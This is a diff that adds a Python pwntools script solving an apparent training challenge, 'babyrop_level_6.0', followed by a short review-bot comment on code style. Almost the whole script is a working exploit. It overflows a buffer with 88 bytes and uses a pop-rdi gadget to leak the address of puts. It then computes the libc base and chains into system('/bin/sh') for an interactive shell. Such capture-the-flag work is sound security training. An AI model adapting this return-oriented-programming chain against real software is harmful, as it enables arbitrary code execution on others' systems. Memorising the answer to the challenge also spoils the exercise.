diff --git a/weiss_overlude/babyrop_level_6.0/a.py b/weiss_overlude/babyrop_level_6.0/a.py
new file mode 100644
index 0000000..eccbd77
--- /dev/null
+++ b/weiss_overlude/babyrop_level_6.0/a.py
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_6_0
+"""
+
+context.binary = target = ELF("./babyrop_level_6_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4023cc
+
+# buf
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
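Review bot: The triple-quoted string placed after `from pwn import *` is a bare expression statement rather than a module docstring, so the patchelf setup note it carries is invisible to `__doc__` and to any tooling that reads it; either move it above the import or turn it into a comment, `# setup: patchelf --replace-needed libcapstone.so.5 <system libcapstone.so.4 path> babyrop_level_6_0`. `s = lambda a: r.sendline(a)` binds a lambda to a name where the plain alias `s = r.sendline` is equivalent and reads more clearly. The file also ends without a trailing newline, which the diff footer flags.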